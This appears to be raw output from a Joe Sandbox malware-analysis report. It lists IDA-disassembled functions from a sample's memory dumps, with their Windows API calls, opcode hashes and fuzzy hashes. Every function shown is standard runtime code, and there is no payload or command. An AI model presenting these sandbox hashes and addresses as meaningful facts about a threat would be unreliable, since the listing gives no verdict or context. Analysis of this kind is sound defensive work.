                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3716348337-0
                                                                                                                                • Opcode ID: 1a4563bb7748c80f337368c4629a88abdf6d3397c5d1ecc35e6eb86a24338dac
                                                                                                                                • Instruction ID: a027bbbf5070aa0bcc6b086cc6a6ba386d9d373103cfaf47535510d091559b93
                                                                                                                                • Opcode Fuzzy Hash: 1a4563bb7748c80f337368c4629a88abdf6d3397c5d1ecc35e6eb86a24338dac
                                                                                                                                • Instruction Fuzzy Hash: 1F01D2B6900115ABCF05EBA4D816ABE77F1BF94310F25260DE512BB2D2CF749E028791
                                                                                                                                APIs
                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000), ref: 00EAA4F7
                                                                                                                                • GetLastError.KERNEL32(?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?,?,?,00EA5365,00000000), ref: 00EAA503
                                                                                                                                  • Part of subcall function 00EAA554: CloseHandle.KERNEL32(FFFFFFFE,00EAA513,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?,?), ref: 00EAA564
                                                                                                                                • ___initconout.LIBCMT ref: 00EAA513
                                                                                                                                  • Part of subcall function 00EAA535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EAA4D1,00EA9AFC,?,?,00EA5A1F,?,00000000,00000000,?), ref: 00EAA548
                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?), ref: 00EAA528
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                • Opcode ID: 6f86f4baf16bf7e0d4d215a2a41f924913ec242b6cbad0799339574c24ec61a1
                                                                                                                                • Instruction ID: 6e81a537ec0e26945518376e2adf568d2037302af1140bb10ce08d85c0ac9573
                                                                                                                                • Opcode Fuzzy Hash: 6f86f4baf16bf7e0d4d215a2a41f924913ec242b6cbad0799339574c24ec61a1
                                                                                                                                • Instruction Fuzzy Hash: 91F03736410215FFCF221FA6EC0999B3F66FF89360B044220FA09B9130E7319924DB95
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00E99266,?,?,?,00000055,?,-00000050,?,?,?), ref: 00EA21D6
                                                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00E99266,?,?,?,00000055,?,-00000050,?,?), ref: 00EA220D
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                                                • String ID: utf8
                                                                                                                                • API String ID: 943130320-905460609
                                                                                                                                • Opcode ID: 5dabd263a472b0fc37319048d0e917dee3adcd00f5450c2a39de320b373bf670
                                                                                                                                • Instruction ID: 86ac1b343bb678847d7960049988ec4b1cb6d94844e10a60eb6e77cbca58e97b
                                                                                                                                • Opcode Fuzzy Hash: 5dabd263a472b0fc37319048d0e917dee3adcd00f5450c2a39de320b373bf670
                                                                                                                                • Instruction Fuzzy Hash: 2351E571644302AADB24AB788C42BA673E8EF5F704F11242DFB05FF181FA74B9448671
                                                                                                                                APIs
                                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00E9DEAD,?,?,00000000,00000000,00000000,?), ref: 00E9DFD1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: EncodePointer
                                                                                                                                • String ID: MOC$RCC
                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                • Opcode ID: 90c7b8a52e3c241f9a5ce866d94129140300ce491d530ac3f6f4d1525842ded1
                                                                                                                                • Instruction ID: f5c7b99d4c0f230e6850fd9bb2f5e30df94fc92e02281c84703d44899eedeeab
                                                                                                                                • Opcode Fuzzy Hash: 90c7b8a52e3c241f9a5ce866d94129140300ce491d530ac3f6f4d1525842ded1
                                                                                                                                • Instruction Fuzzy Hash: 8E416B72A00209AFCF26DF98DC81AEEBBB5FF48304F189059FA0877261D3759990DB50
                                                                                                                                APIs
                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00E9DA8F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___except_validate_context_record
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 3493665558-3733052814
                                                                                                                                • Opcode ID: f9827a029eb534b8eeea0729f57369215a48e5049ec38712c3bc9963a6c48b65
                                                                                                                                • Instruction ID: 14d667345c22a3ab3739b29a9ab40af9d6898a675b9035d6c77df36c291724d1
                                                                                                                                • Opcode Fuzzy Hash: f9827a029eb534b8eeea0729f57369215a48e5049ec38712c3bc9963a6c48b65
                                                                                                                                • Instruction Fuzzy Hash: 3F31F332508228EFCF228F90CC409EA7B65FF08369F19515AFC546A221E372CCB1DB91
                                                                                                                                APIs
                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E94B74
                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00E94C5C
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                • String ID: xf
                                                                                                                                • API String ID: 3761405300-1711152663
                                                                                                                                • Opcode ID: ed1ab0a83301f927711fc810f480b536cbdf8116103850510b8a2f196b4581cc
                                                                                                                                • Instruction ID: 2c287bc369c9c98b72a6297c7f2fbd6c984f4a6ba26b3b045c44dc3592b45c1f
                                                                                                                                • Opcode Fuzzy Hash: ed1ab0a83301f927711fc810f480b536cbdf8116103850510b8a2f196b4581cc
                                                                                                                                • Instruction Fuzzy Hash: B421E3B55013209FD701CF27E945B567BF4FB48318F20526BE609AB3A4EBB95889CF44
                                                                                                                                APIs
                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E94A97
                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00E94B54
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                • String ID: xf
                                                                                                                                • API String ID: 3761405300-1711152663
                                                                                                                                • Opcode ID: e8eff5eebfbb6f6ffc6d46e6d5cb774727bbb75bc4dd09f503bebdbd6868d5e6
                                                                                                                                • Instruction ID: 6796621829b2aadc98f026dc601ccf9a235aaf40e44e0c298e51e60d8647c4e0
                                                                                                                                • Opcode Fuzzy Hash: e8eff5eebfbb6f6ffc6d46e6d5cb774727bbb75bc4dd09f503bebdbd6868d5e6
                                                                                                                                • Instruction Fuzzy Hash: 4511DFB55113249FD701CF67E9856527BF4FB08308B10A26BE908AB3A4EBB89949CF05
                                                                                                                                APIs
                                                                                                                                • AcquireSRWLockExclusive.KERNEL32(00EB648C,ios_base::badbit set,?,?,00E91C84,00EB6478,00E91B17), ref: 00E929DF
                                                                                                                                • ReleaseSRWLockExclusive.KERNEL32(00EB648C,?,?,00E91C84,00EB6478,00E91B17), ref: 00E92A19
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                • String ID: ios_base::badbit set
                                                                                                                                • API String ID: 17069307-3882152299
                                                                                                                                • Opcode ID: 558e0259e5dd4e5cc29c90818b58db498b85f200a14cf925ad6b2f4993adda57
                                                                                                                                • Instruction ID: cfa6aaeff5961fe4b88e4340049ddc1bdd449aaaaa4d28b4ca5dbbd0cf8873e3
                                                                                                                                • Opcode Fuzzy Hash: 558e0259e5dd4e5cc29c90818b58db498b85f200a14cf925ad6b2f4993adda57
                                                                                                                                • Instruction Fuzzy Hash: 9CF0A731500500EFCF209F19D805AA6BBB8FBC5734F10132EEAA6732E0C7355846DA55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000003.1737376014.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Offset: 0372A000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_3_372c000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
                                                                                                                                • Instruction ID: 6c12277abc5b250c3bdc6b9659d122b0848815b2b195980775c81e4740cb7391
                                                                                                                                • Opcode Fuzzy Hash: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
                                                                                                                                • Instruction Fuzzy Hash: 0EF0460005EAC38A970FAB3811B80DBFFA6AC1B2707E82789C8E00A197E71412A4C391
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000003.1737376014.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Offset: 0372C000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_3_372c000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
                                                                                                                                • Instruction ID: 6c12277abc5b250c3bdc6b9659d122b0848815b2b195980775c81e4740cb7391
                                                                                                                                • Opcode Fuzzy Hash: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
                                                                                                                                • Instruction Fuzzy Hash: 0EF0460005EAC38A970FAB3811B80DBFFA6AC1B2707E82789C8E00A197E71412A4C391